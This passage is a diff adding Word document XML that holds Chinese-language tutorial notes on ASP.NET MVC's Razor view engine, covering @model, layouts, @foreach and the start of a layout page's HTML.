+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Razor引擎</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图引擎</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(View Engine)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>负责处理</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的内容</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，并查找有关指令，这些指令典型的是将动态内容插入到发送给浏览器的输出，而</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Razor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>框架视图引擎的名称。以下是各个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Razor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>语法的起到的作用。</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a7"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="5341"/>
+        <w:gridCol w:w="5341"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>问题</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>解决方案</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>定义并访问模型对象</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:highlight w:val="yellow"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>@model</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>及</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:highlight w:val="yellow"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>@Model</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>表达式</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>减少视图中的重复</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用布局</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用默认布局</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用启动视图</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>通过控制器将数据传给视图</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>传递视图模型对象或视图包</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>根据数值不同输出不同结果</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>Razor</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>条件语句</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>枚举数组或集合</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>@foreach</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>表达式</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>在视图中添加命名控件</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5341" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:rPr>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>@using</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>表达式</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>使用模型对象</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在视图的第一行声明：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>@model</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 命名空间</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>这样我们就能在后面通过@Model调用对象的属性，字段，方法了例如：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>@Model</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.Name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>//调用Name字段</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>使用布局</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>我</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>们可以在View中新建一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>MVC5 Layout Page(Razor)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>布局视图</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4230370" cy="2409190"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="8" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4230370" cy="2409190"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>生成的页面如下所示：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>!DOCTYPE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
